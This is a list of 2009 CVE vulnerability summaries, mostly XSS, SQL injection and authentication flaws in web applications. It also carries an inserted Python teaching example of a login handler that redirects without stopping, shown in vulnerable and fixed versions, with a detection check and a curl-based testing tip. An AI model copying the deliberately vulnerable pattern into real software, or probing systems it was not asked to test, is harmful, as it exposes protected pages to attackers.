[CVE-2009-2497] The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0, 2.0 SP1, 2.0 SP2, 3.5, and 3.5 SP1, and Silverlight 2, does not properly handle interfaces, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP), (2) a crafted Silverlight application, (3) a crafted ASP.NET application, or (4) a crafted .NET Framework application, aka "Microsoft Silverlight and Microsoft .NET Framework CLR Vulnerability."
[CVE-2009-2496] Heap-based buffer overflow in the Office Web Components ActiveX Control in Microsoft Office XP SP3, Office 2003 SP3, Office XP Web Components SP3, Office 2003 Web Components SP3, Office 2003 Web Components SP1 for the 2007 Microsoft Office System, Internet Security and Acceleration (ISA) Server 2004 SP3 and 2006 SP1, and Office Small Business Accounting 2006 allows remote attackers to execute arbitrary code via unspecified parameters to unknown methods, aka "Office Web Components Heap Corruption Vulnerability."
[CVE-2009-2492] Cross-site scripting (XSS) vulnerability in mt-wizard.cgi in Six Apart Movable Type before 4.261 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2009-2480.
[CVE-2009-2480] Cross-site scripting (XSS) vulnerability in mt-wizard.cgi in Six Apart Movable Type 4.24, and 4.25 when global templates are not initialized, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-2455] Multiple cross-site scripting (XSS) vulnerabilities in webadmin/admin.php in @mail 5.6.1 allow remote attackers to inject arbitrary web script or HTML via the (1) type and (2) func parameters. NOTE: the provenance of this information is unknown
[CVE-2009-2448] Cross-site scripting (XSS) vulnerability in ogp_show.php in Online Guestbook Pro 5.1 allows remote attackers to inject arbitrary web script or HTML via the search_choice parameter. NOTE: the provenance of this information is unknown
[CVE-2009-2447] Multiple cross-site scripting (XSS) vulnerabilities in ogp_show.php in Online Guestbook Pro 5.1 allow remote attackers to inject arbitrary web script or HTML via the (1) search or (2) display parameter.
[CVE-2009-2445] Oracle iPlanet Web Server (formerly Sun Java System Web Server or Sun ONE Web Server) 6.1 before SP12, and 7.0 through Update 6, when running on Windows, allows remote attackers to read arbitrary JSP files via an alternate data stream syntax, as demonstrated by a .jsp::$DATA URI.
[CVE-2009-2442] Cross-site scripting (XSS) vulnerability in public/index.php in Linea21 1.2.1 allows remote attackers to inject arbitrary web script or HTML via the search parameter in a resultats-recherche action.
[CVE-2009-2441] Cross-site scripting (XSS) vulnerability in ogp_show.php in Online Guestbook Pro 5.1 allows remote attackers to inject arbitrary web script or HTML via the entry parameter.
[CVE-2009-2440] Cross-site scripting (XSS) vulnerability in index.php in JNM Guestbook 3.0 allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2009-2439] Multiple SQL injection vulnerabilities in Web Development House Alibaba Clone allow remote attackers to execute arbitrary SQL commands via the (1) IndustryID parameter to category.php and the (2) SellerID parameter to supplier/view_contact_details.php. NOTE: this is a product that was developed by a third party
[CVE-2009-2438] Cross-site scripting (XSS) vulnerability in index.php in the search module in ClanSphere 2009.0 and 2009.0.2 allows remote attackers to inject arbitrary web script or HTML via the text parameter in a list action. NOTE: this might overlap CVE-2008-1399.
[CVE-2009-2437] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Rentventory 1.0.1 allow remote attackers to inject arbitrary web script or HTML via the (1) username (aka Login) and (2) password parameters in a login action.
[CVE-2009-2435] The Sametime server in IBM Lotus Instant Messaging and Web Conferencing 6.5.1 generates error messages for a failed logon attempt with different time delays depending on whether the user account exists, which allows remote attackers to enumerate valid usernames.
[CVE-2009-2429] SmartFilter Web Gateway Security 4.2.1.00 stores user credentials in cleartext in admin_backup.xml files and uses insecure permissions for these files, which allows local users to gain privileges. NOTE: the provenance of this information is unknown
[CVE-2009-2424] Cross-site scripting (XSS) vulnerability in search.php in Ebay Clone 2009 allows remote attackers to inject arbitrary web script or HTML via the mode parameter.
[CVE-2009-2419] Use-after-free vulnerability in the servePendingRequests function in WebCore in WebKit in Apple Safari 4.0 and 4.0.1 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted HTML document that references a zero-length .js file and the JavaScript reload function. NOTE: some of these details are obtained from third party information.
[CVE-2009-2405] Multiple cross-site scripting (XSS) vulnerabilities in the Web Console in the Application Server in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2.0 before 4.2.0.CP08, 4.2.2GA, 4.3 before 4.3.0.CP07, and 5.1.0GA allow remote attackers to inject arbitrary web script or HTML via the (1) monitorName, (2) objectName, (3) attribute, or (4) period parameter to createSnapshot.jsp, or the (5) monitorName, (6) objectName, (7) attribute, (8) threshold, (9) period, or (10) enabled parameter to createThresholdMonitor.jsp. NOTE: some of these details are obtained from third party information.
[CVE-2009-2401] Cross-site scripting (XSS) vulnerability in PHPEcho CMS 2.0-rc3 allows remote attackers to inject arbitrary web script or HTML via a forum post.
[CVE-2009-2391] Cross-site scripting (XSS) vulnerability in text.php in Virtuenetz Virtue Online Test Generator allows remote attackers to inject arbitrary web script or HTML via the tid parameter.
[CVE-2009-2383] SQL injection vulnerability in BTE_RW_webajax.php in the Related Sites plugin 2.1 for WordPress allows remote attackers to execute arbitrary SQL commands via the guid parameter.
[CVE-2009-2380] Cross-site scripting (XSS) vulnerability in includes/functions.php in 4images 1.7 through 1.7.7 allows remote attackers to inject arbitrary web script or HTML via vectors related to the url variable.
[CVE-2009-2379] Directory traversal vulnerability in public/index.php in BIGACE Web CMS 2.6 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the cmd parameter.
[CVE-2009-2376] Cross-site scripting (XSS) vulnerability in the Html::textarea function in application/libraries/Html.php in TangoCMS 2.x before 2.3.0 allows remote attackers to inject arbitrary web script or HTML via the value parameter, related to the Contact module.
[CVE-2009-2374] Drupal 5.x before 5.19 and 6.x before 6.13 does not properly sanitize failed login attempts for pages that contain a sortable table, which includes the username and password in links that can be read from (1) the HTTP referer header of external web sites that are visited from those links or (2) when page caching is enabled, the Drupal page cache.
[CVE-2009-2373] Cross-site scripting (XSS) vulnerability in the Forum module in Drupal 6.x before 6.13 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-2372] Drupal 6.x before 6.13 does not prevent users from modifying user signatures after the associated comment format has been changed to an administrator-controlled input format, which allows remote authenticated users to inject arbitrary web script, HTML, and possibly PHP code via a crafted user signature.
[CVE-2009-2371] Advanced Forum 6.x before 6.x-1.1, a module for Drupal, does not prevent users from modifying user signatures after the associated comment format has been changed to an administrator-controlled input format, which allows remote authenticated users to inject arbitrary web script, HTML, and possibly PHP code via a crafted user signature.
[CVE-2009-2370] Cross-site scripting (XSS) vulnerability in Advanced Forum 5.x before 5.x-1.1 and 6.x before 6.x-1.1, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-2360] Cross-site scripting (XSS) vulnerability in passwd/main.php in the Passwd module before 3.1.1 for Horde allows remote attackers to inject arbitrary web script or HTML via the backend parameter.
[CVE-2009-2356] Multiple stack-based buffer overflows in the pgsqlQuery function in NullLogic Groupware 1.2.7, when PostgreSQL is used, might allow remote attackers to execute arbitrary code via input to the (1) POP3, (2) SMTP, or (3) web component that triggers a long SQL query.
[CVE-2009-2353] encoder.php in eAccelerator allows remote attackers to execute arbitrary code by copying a local executable file to a location under the web root via the -o option, and then making a direct request to this file, related to upload of image files.
[CVE-2009-2343] Cross-site scripting (XSS) vulnerability in people.php in Zoph before 0.7.0.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: some of these details are obtained from third party information.
[CVE-2009-2342] Cross-site scripting (XSS) vulnerability in admin.php (aka the login page) in Content Management Made Easy (CMME) before 1.22 allows remote attackers to inject arbitrary web script or HTML via the username field.
[CVE-2009-2338] Directory traversal vulnerability in includes/startmodules.inc.php in FreeWebshop.org 2.2.9 R2, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang_file parameter.
[CVE-2009-2336] The forgotten mail interface in WordPress and WordPress MU before 2.8.1 exhibits different behavior for a password request depending on whether the user account exists, which allows remote attackers to enumerate valid usernames. NOTE: the vendor reportedly disputes the significance of this issue, indicating that the behavior exists for "user convenience."
[CVE-2009-2330] Cross-site scripting (XSS) vulnerability in admin/admin_menu.php in CMS Chainuk 1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the menu parameter.
[CVE-2009-2327] Cross-site scripting (XSS) vulnerability in add_voting.php in KerviNet Forum 1.1 and earlier allows remote authenticated users to inject arbitrary web script or HTML via the v_variant1 parameter.
[CVE-2009-2324] Multiple cross-site scripting (XSS) vulnerabilities in FCKeditor before 2.6.4.1 allow remote attackers to inject arbitrary web script or HTML via components in the samples (aka _samples) directory.
[CVE-2009-2322] Cross-site scripting (XSS) vulnerability in cgi-bin/sysconf.cgi on the Axesstel MV 410R allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-2312] SmartFilter Web Gateway Security 4.2.1.00 stores user credentials in cleartext in config.txt and uses insecure permissions for this file, which allows local users to gain privileges.
[CVE-2009-2306] The ARD-9808 DVR card security camera stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a file containing usernames and passwords via a direct request for dvr.ini.
[CVE-2009-2302] Cross-site scripting (XSS) vulnerability in index.php in Aardvark Topsites PHP 5.2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action. NOTE: it was later reported that 5.2.1 is also affected.
[CVE-2009-2301] The radware AppWall Web Application Firewall (WAF) 1.0.2.6, with Gateway 4.6.0.2, allows remote attackers to read source code via a direct request to (1) funcs.inc, (2) defines.inc, or (3) msg.inc in Management/.
[CVE-2009-2299] The Artofdefence Hyperguard Web Application Firewall (WAF) module before 2.5.5-11635, 3.0 before 3.0.3-11636, and 3.1 before 3.1.1-11637, a module for the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via an HTTP request with a large Content-Length value but no POST data.
[CVE-2009-2298] Stack-based buffer overflow in rping in HP OpenView Network Node Manager (OV NNM) 7.53 on Linux allows remote attackers to execute arbitrary code via unspecified vectors, possibly involving a CGI request to webappmon.exe. NOTE: this may overlap CVE-2009-1420.
[CVE-2009-2293] Optimum Web Design Tutorial Share 3.5.0 and earlier allows remote attackers to bypass authentication and obtain administrative access by setting the usernamed cookie parameter.
[CVE-2009-2292] Cross-site scripting (XSS) vulnerability in Appleple a-News 2.32 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-2289] Cross-site scripting (XSS) vulnerability in index.php in Arcade Trade Script 1.0 beta allows remote attackers to inject arbitrary web script or HTML via the q parameter in a gamelist action.
[CVE-2009-2284] Cross-site scripting (XSS) vulnerability in phpMyAdmin before 3.2.0.1 allows remote attackers to inject arbitrary web script or HTML via a crafted SQL bookmark.
[CVE-2009-2283] Multiple cross-site scripting (XSS) vulnerabilities in the help jsp scripts in Sun Java Web Console 3.0.2 through 3.0.5, and Sun Java Web Console in Solaris 10, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-2277] Cross-site scripting (XSS) vulnerability in WebAccess in VMware VirtualCenter 2.0.2 and 2.5 and VMware ESX 3.0.3 and 3.5 allows remote attackers to inject arbitrary web script or HTML via vectors related to "context data."
[CVE-2009-2268] Cross-site scripting (XSS) vulnerability in the Cross-Domain Controller (CDC) servlet in Sun Java System Access Manager 6 2005Q1, 7 2005Q4, and 7.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-2241] Cross-site scripting (XSS) vulnerability in search.asp in ASP Inline Corporate Calendar allows remote attackers to inject arbitrary web script or HTML via the keyword parameter.
[CVE-2009-2240] Cross-site scripting (XSS) vulnerability in AD2000 free-sw leger (aka Web Conference Room Free) 1.6.4 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-2238] Unrestricted file upload vulnerability in includes/shared_scripts/wysiwyg_editor/assetmanager/assetmanager.asp in DMXReady Registration Manager 1.1 allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in assets/webblogmanager.
[CVE-2009-2233] The admin interface in AWScripts.com Gallery Search Engine 1.5 allows remote attackers to bypass authentication and gain administrative access by setting the awse_logged cookie to 1.
[CVE-2009-2228] Cross-site scripting (XSS) vulnerability in engine.php in Kasseler CMS allows remote attackers to inject arbitrary web script or HTML via the url parameter in a redirect action.
[CVE-2009-2226] Cross-site scripting (XSS) vulnerability in Let's PHP! Tree BBS 2004/11/23 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-2221] Cross-site scripting (XSS) vulnerability in PHP-I-BOARD 1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-2219] Multiple cross-site scripting (XSS) vulnerabilities in phpCollegeExchange 0.1.5c allow remote attackers to inject arbitrary web script or HTML via the (1) _SESSION[handle] parameter to (a) home.php, (b) books/allbooks.php, or (c) books/home.php
[CVE-2009-2217] Cross-site scripting (XSS) vulnerability in NBBC before 1.4.2 allows remote attackers to inject arbitrary web script or HTML via an invalid URL in a BBCode img tag.
[CVE-2009-2216] Cross-site scripting (XSS) vulnerability in CMD_REDIRECT in DirectAdmin 1.33.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the URI in a view=advanced request.
[CVE-2009-2215] Multiple cross-site scripting (XSS) vulnerabilities in URD before 0.6.2 allow remote attackers to inject arbitrary web script or HTML via vectors related to the fatal_error page and unspecified other components.
[CVE-2009-2212] The CQWeb server in IBM Rational ClearQuest 7.0.0 before 7.0.0.6 and 7.0.1 before 7.0.1.5 allows attackers to discover a (1) username or (2) password via unspecified vectors.
[CVE-2009-2211] Cross-site scripting (XSS) vulnerability in the CQWeb server in IBM Rational ClearQuest 7.0.0 before 7.0.0.6 and 7.0.1 before 7.0.1.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-2208] FreeBSD 6.3, 6.4, 7.1, and 7.2 does not enforce permissions on the SIOCSIFINFO_IN6 IOCTL, which allows local users to modify or disable IPv6 network interfaces, as demonstrated by modifying the MTU.
[CVE-2009-2205] Stack-based buffer overflow in the Java Web Start command launcher in Java for Mac OS X 10.5 before Update 5 allows attackers to execute arbitrary code or cause a denial of service (application crash) via unspecified vectors.
[CVE-2009-2200] WebKit in Apple Safari before 4.0.3 does not properly restrict the URL scheme of the pluginspage attribute of an EMBED element, which allows user-assisted remote attackers to launch arbitrary file: URLs and obtain sensitive information via a crafted HTML document.
[CVE-2009-2199] Incomplete blacklist vulnerability in WebKit in Apple Safari before 4.0.3, as used on iPhone OS before 3.1, iPhone OS before 3.1.1 for iPod touch, and other platforms, allows remote attackers to spoof domain names in URLs, and possibly conduct phishing attacks, via unspecified homoglyphs.
[CVE-2009-2198] Apple GarageBand before 5.1 reconfigures Safari to accept all cookies regardless of domain name, which makes it easier for remote web servers to track users.
[CVE-2009-2196] Unspecified vulnerability in Apple Safari 4 before 4.0.3 allows remote web servers to place an arbitrary web site in the Top Sites view, and possibly conduct phishing attacks, via unknown vectors.
[CVE-2009-2195] Buffer overflow in WebKit in Apple Safari before 4.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted floating-point numbers.
[CVE-2009-2181] Cross-site scripting (XSS) vulnerability in admin-files/templates/list_dir.php in Campsite 3.3.0 RC1 allows remote attackers to inject arbitrary web script or HTML via the listbasedir parameter.
[CVE-2009-2178] Cross-site scripting (XSS) vulnerability in website.php in phpDatingClub 3.7 allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2009-2172] Cross-site scripting (XSS) vulnerability in forum/radioandtv.php in the Radio and TV Player addon for vBulletin allows remote registered users to inject arbitrary web script or HTML via the station parameter.
[CVE-2009-2170] Multiple cross-site scripting (XSS) vulnerabilities in Mahara 1.0 before 1.0.12 and 1.1 before 1.1.5 allow remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2009-2168] cpanel/login.php in EgyPlus 7ammel (aka 7ml) 1.0.1 and earlier sends a redirect to the web browser but does not exit when the supplied credentials are incorrect, which allows remote attackers to bypass authentication by providing arbitrary username and password parameters.
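The entry above names a small but recurring authentication bug: the handler emits a redirect on bad credentials but does not stop, so the protected page is still appended to the 302 body, and any client that ignores the Location header reads it. As an added example (not code from EgyPlus 7ammel, whose implementation is PHP), the two handlers below reproduce the faulty and the corrected control flow, and the last function is the black-box check a tester applies to a captured response. The panel markup and the credential table are constructed.

```python
from dataclasses import dataclass, field

# Constructed stand-ins: a fixed "control panel" page and one valid account.
ADMIN_PANEL_HTML = "<h1>Control panel</h1><a href='users.php'>Manage users</a>"
VALID_USERS = {"admin": "correct horse battery staple"}


@dataclass
class Response:
    status: int = 200
    headers: dict = field(default_factory=dict)
    body: str = ""


def credentials_ok(username: str, password: str) -> bool:
    return VALID_USERS.get(username) == password


def vulnerable_login(username: str, password: str) -> Response:
    """The bug class: a redirect header is queued on bad credentials but the handler
    keeps running, so the protected page is still written into the 302 response
    (PHP equivalent: header('Location: ...') with no exit/die after it)."""
    resp = Response()
    if not credentials_ok(username, password):
        resp.status = 302
        resp.headers["Location"] = "login.php?error=1"
        # BUG: execution should stop here.
    resp.body = ADMIN_PANEL_HTML
    return resp


def fixed_login(username: str, password: str) -> Response:
    """Same handler with the early return; nothing sensitive is rendered."""
    resp = Response()
    if not credentials_ok(username, password):
        resp.status = 302
        resp.headers["Location"] = "login.php?error=1"
        return resp
    resp.body = ADMIN_PANEL_HTML
    return resp


def redirect_leaks_content(resp: Response, marker: str = "<h1>") -> bool:
    """Black-box check for a captured response: a 3xx whose body carries application
    markup means the handler did not stop after issuing the redirect."""
    return 300 <= resp.status < 400 and marker in resp.body
```

Browsers follow the Location header and never show the 302 body, which is why the bug survives casual testing; reproduce it with a client that does not auto-follow redirects (curl with -i and without -L) or through an intercepting proxy, and read the body of the 302.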
[CVE-2009-2163] Cross-site scripting (XSS) vulnerability in login/default.aspx in Sitecore CMS before 6.0.2 Update-1 090507 allows remote attackers to inject arbitrary web script or HTML via the sc_error parameter.
[CVE-2009-2162] Cross-site scripting (XSS) vulnerability in the XOOPS MANIAC PukiWikiMod module 1.6.6.2 and earlier for XOOPS allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-2161] Directory traversal vulnerability in backend/admin-functions.php in TorrentTrader Classic 1.09, when used on a case-insensitive web site, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the ss_uri parameter, in conjunction with a modified component name.
[CVE-2009-2156] Multiple cross-site scripting (XSS) vulnerabilities in TorrentTrader Classic 1.09 allow remote authenticated users to inject arbitrary web script or HTML via (1) the Title field to requests.php, related to viewrequests.php
[CVE-2009-2155] Cross-site scripting (XSS) vulnerability in report/ReportViewAction.do in WebNMS Free Edition 5 allows remote attackers to inject arbitrary web script or HTML via the type parameter. NOTE: the provenance of this information is unknown
[CVE-2009-2153] Cross-site scripting (XSS) vulnerability in index.php in Impleo Music Collection 2.0 allows remote attackers to inject arbitrary web script or HTML via the sort parameter.
[CVE-2009-2152] SQL injection vulnerability in a_index.php in AdaptWeb 0.9.2 allows remote attackers to execute arbitrary SQL commands via the CodigoDisciplina parameter in a TopicosCadastro1 action.
[CVE-2009-2151] Directory traversal vulnerability in index.php in AdaptWeb 0.9.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the newlang parameter.
[CVE-2009-2149] Multiple cross-site scripting (XSS) vulnerabilities in Campus Virtual-LMS allow remote attackers to inject arbitrary web script or HTML via the (1) courseid parameter to enrolments/step1.php, or the (2) search or (3) siteid parameter to files/shared_list.php.
[CVE-2009-2147] SQL injection vulnerability in fdown.php in phpWebThings 1.5.2 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter.
[CVE-2009-2145] Multiple cross-site scripting (XSS) vulnerabilities in transLucid 1.75 allow remote attackers to inject arbitrary web script or HTML via the (a) NodeID and (b) action parameters to the default URI, and the (c) NodeID parameter to the default URI for the admin section
[CVE-2009-2141] Multiple cross-site scripting (XSS) vulnerabilities in TBDev.NET 01-01-08 allow remote attackers to inject arbitrary web script or HTML via (1) the returnto parameter to makepoll.php, (2) the returnto parameter in a delete action to polls.php, or the (3) Info or (4) Avatar field to my.php.
[CVE-2009-2138] Multiple open redirect vulnerabilities in TBDev.NET 01-01-08 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via (1) the returnto parameter to login.php or (2) the returnto parameter in a delete action to news.php. NOTE: this can be leveraged for cross-site scripting (XSS) by redirecting to a data: URI.
[CVE-2009-2136] Unspecified vulnerability in the TCP/IP networking stack in Sun Solaris 10, and OpenSolaris snv_01 through snv_82 and snv_111 through snv_117, when a Cassini GigaSwift Ethernet Adapter (aka CE) interface is used, allows remote attackers to cause a denial of service (panic) via vectors involving jumbo frames.
[CVE-2009-2133] Multiple cross-site scripting (XSS) vulnerabilities in Pivot 1.40.4 and 1.40.7 allow remote attackers to inject arbitrary web script or HTML via the (1) menu or (2) sort parameter to pivot/index.php, (3) the value of a check array parameter in a delete action to pivot/index.php, (4) the element name in a check array parameter in a delete action to pivot/index.php, (5) the edituser parameter in an edituser action to pivot/index.php, (6) the edit parameter in a templates action to pivot/index.php, (7) the blog parameter in a blog_edit1 action to pivot/index.php, (8) the cat parameter in a cat_edit action to pivot/index.php, (9) a certain form field in a doaction=1 request to pivot/index.php, (10) the url field in a my_weblog edit_prefs action to pivot/user.php, or (11) the username (aka name) field in a my_weblog reg_user action to pivot/user.php.
[CVE-2009-2131] Cross-site scripting (XSS) vulnerability in 4images 1.7.7 and earlier allows remote authenticated users to inject arbitrary web script or HTML by providing a crafted user_homepage parameter to member.php, and then posting a comment associated with a picture.
[CVE-2009-2127] Cross-site scripting (XSS) vulnerability in show_activity.php in Elvin 1.2.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2009-2126] Cross-site scripting (XSS) vulnerability in close_bug.php in Elvin before 1.2.1 allows remote attackers to inject arbitrary web script or HTML via the title (aka subject) field.
[CVE-2009-2114] Multiple cross-site scripting (XSS) vulnerabilities in admin.php in SkyBlueCanvas 1.1 r237 allow remote attackers to inject arbitrary web script or HTML via the (1) mgroup, (2) mgr, (3) objtype, (4) id, and (5) dir parameters.
[CVE-2009-2113] Multiple SQL injection vulnerabilities in FretsWeb 1.2 allow remote attackers to execute arbitrary SQL commands via the (1) name parameter to player.php and the (2) hash parameter to song.php.
[CVE-2009-2109] Multiple directory traversal vulnerabilities in FretsWeb 1.2 allow remote attackers to read arbitrary files via directory traversal sequences in the (1) language parameter to charts.php and the (2) fretsweb_language cookie parameter to unspecified vectors, possibly related to admin/common.php.
[CVE-2009-2107] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Webmedia Explorer (webmex) 5.09 and 5.10 allow remote attackers to inject arbitrary web script or HTML via event handlers such as onmouseover in the (1) search or (2) tag parameters
[CVE-2009-2104] Cross-site scripting (XSS) vulnerability in the Modern Guestbook / Commenting System (ve_guestbook) extension 2.7.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-2094] Unspecified vulnerability in IBM WebSphere Commerce 6.0 Enterprise before 6.0.0.8, when trace is enabled, allows local users to obtain sensitive information via unknown vectors.
[CVE-2009-2093] SQL injection vulnerability in the console in IBM WebSphere Partner Gateway (WPG) Enterprise 6.0 before FP8, 6.1 before FP3, 6.1.1 before FP2, and 6.2 before FP1 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors.
[CVE-2009-2092] IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.5 does not properly read the portletServingEnabled parameter in ibm-portlet-ext.xmi, which allows remote attackers to bypass intended access restrictions via unknown vectors.
[CVE-2009-2091] The System Management/Repository component in IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.5 on z/OS uses weak file permissions for new applications, which allows remote attackers to obtain sensitive information via unspecified vectors.
[CVE-2009-2090] Unspecified vulnerability in wsadmin in the System Management/Repository component in IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.5 allows remote attackers to bypass intended Java Management Extensions (JMX) Management Beans (aka MBeans) access restrictions, and cause a denial of service (daemon stop), via unknown vectors.
[CVE-2009-2089] The Migration component in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.25 and 7.0 before 7.0.0.5, when tracing is enabled and a 6.1 to 7.0 migration has occurred, allows remote authenticated users to obtain sensitive information by reading a Migration Trace file.
[CVE-2009-2088] The Servlet Engine/Web Container component in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.25 and 7.0 before 7.0.0.5, when SPNEGO Single Sign-on (SSO) and disableSecurityPreInvokeOnFilters are configured, allows remote attackers to bypass authentication via a request for a "secure URL," related to a certain invokefilterscompatibility property.
[CVE-2009-2087] The Web Services functionality in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.25 and 7.0 before 7.0.0.5, in certain circumstances involving the ibm-webservicesclient-bind.xmi file and custom password encryption, uses weak password obfuscation, which allows local users to cause a denial of service (deployment failure) via unspecified vectors.
[CVE-2009-2085] The Security component in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.25 and 7.0 before 7.0.0.5 does not properly handle use of Identity Assertion with CSIv2 Security, which allows remote attackers to bypass intended CSIv2 access restrictions via vectors involving Enterprise JavaBeans (EJB).
[CVE-2009-2083] Cross-site scripting (XSS) vulnerability in the term data detail page in Taxonomy manager 5.x before 5.x-1.2, a module for Drupal, allows remote authenticated users, with administer taxonomy privileges or the ability to use free tagging to add taxonomy terms, to inject arbitrary web script or HTML via "Parent and related terms."
[CVE-2009-2082] SQL injection vulnerability in insidepage.php in Creative Web Solutions Multi-Level CMS 1.21 allows remote attackers to execute arbitrary SQL commands via the catid parameter. NOTE: some of these details are obtained from third party information.
[CVE-2009-2081] Directory traversal vulnerability in help.php in phpWebThings 1.5.2 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the module parameter.
[CVE-2009-2078] Multiple cross-site scripting (XSS) vulnerabilities in Booktree 5.x before 5.x-7.3 and 6.x before 6.x-1.1, a module for Drupal, allow remote attackers to inject arbitrary web script or HTML via the (1) node title and (2) node body in a tree root page.
[CVE-2009-2074] Cross-site scripting (XSS) vulnerability in Nodequeue 5.x before 5.x-2.7 and 6.x before 6.x-2.2, a module for Drupal, allows remote authenticated users with administer taxonomy permissions to inject arbitrary web script or HTML via vocabulary names.
[CVE-2009-2072] Apple Safari does not require a cached certificate before displaying a lock icon for an https web site, which allows man-in-the-middle attackers to spoof an arbitrary https site by sending the browser a crafted (1) 4xx or (2) 5xx CONNECT response page for an https request sent through a proxy server.
[CVE-2009-2068] Google Chrome detects http content in https web pages only when the top-level frame uses https, which allows man-in-the-middle attackers to execute arbitrary web script, in an https site's context, by modifying an http page to include an https iframe that references a script file on an http site, related to "HTTP-Intended-but-HTTPS-Loadable (HPIHSL) pages."
[CVE-2009-2067] Opera detects http content in https web pages only when the top-level frame uses https, which allows man-in-the-middle attackers to execute arbitrary web script, in an https site's context, by modifying an http page to include an https iframe that references a script file on an http site, related to "HTTP-Intended-but-HTTPS-Loadable (HPIHSL) pages."
[CVE-2009-2066] Apple Safari detects http content in https web pages only when the top-level frame uses https, which allows man-in-the-middle attackers to execute arbitrary web script, in an https site's context, by modifying an http page to include an https iframe that references a script file on an http site, related to "HTTP-Intended-but-HTTPS-Loadable (HPIHSL) pages."
[CVE-2009-2065] Mozilla Firefox 3.0.10, and possibly other versions, detects http content in https web pages only when the top-level frame uses https, which allows man-in-the-middle attackers to execute arbitrary web script, in an https site's context, by modifying an http page to include an https iframe that references a script file on an http site, related to "HTTP-Intended-but-HTTPS-Loadable (HPIHSL) pages."
[CVE-2009-2064] Microsoft Internet Explorer 8, and possibly other versions, detects http content in https web pages only when the top-level frame uses https, which allows man-in-the-middle attackers to execute arbitrary web script, in an https site's context, by modifying an http page to include an https iframe that references a script file on an http site, related to "HTTP-Intended-but-HTTPS-Loadable (HPIHSL) pages."
[CVE-2009-2063] Opera, possibly before 9.25, processes a 3xx HTTP CONNECT response before a successful SSL handshake, which allows man-in-the-middle attackers to execute arbitrary web script, in an https site's context, by modifying this CONNECT response to specify a 302 redirect to an arbitrary https web site.
[CVE-2009-2062] Apple Safari before 3.2.2 processes a 3xx HTTP CONNECT response before a successful SSL handshake, which allows man-in-the-middle attackers to execute arbitrary web script, in an https site's context, by modifying this CONNECT response to specify a 302 redirect to an arbitrary https web site.
[CVE-2009-2061] Mozilla Firefox before 3.0.10 processes a 3xx HTTP CONNECT response before a successful SSL handshake, which allows man-in-the-middle attackers to execute arbitrary web script, in an https site's context, by modifying this CONNECT response to specify a 302 redirect to an arbitrary https web site.
[CVE-2009-2060] src/net/http/http_transaction_winhttp.cc in Google Chrome before 1.0.154.53 uses the HTTP Host header to determine the context of a document provided in a (1) 4xx or (2) 5xx CONNECT response from a proxy server, which allows man-in-the-middle attackers to execute arbitrary web script by modifying this CONNECT response, aka an "SSL tampering" attack.
[CVE-2009-2059] Opera, possibly before 9.25, uses the HTTP Host header to determine the context of a document provided in a (1) 4xx or (2) 5xx CONNECT response from a proxy server, which allows man-in-the-middle attackers to execute arbitrary web script by modifying this CONNECT response, aka an "SSL tampering" attack.
[CVE-2009-2058] Apple Safari before 3.2.2 uses the HTTP Host header to determine the context of a document provided in a (1) 4xx or (2) 5xx CONNECT response from a proxy server, which allows man-in-the-middle attackers to execute arbitrary web script by modifying this CONNECT response, aka an "SSL tampering" attack.
[CVE-2009-2057] Microsoft Internet Explorer before 8 uses the HTTP Host header to determine the context of a document provided in a (1) 4xx or (2) 5xx CONNECT response from a proxy server, which allows man-in-the-middle attackers to execute arbitrary web script by modifying this CONNECT response, aka an "SSL tampering" attack.
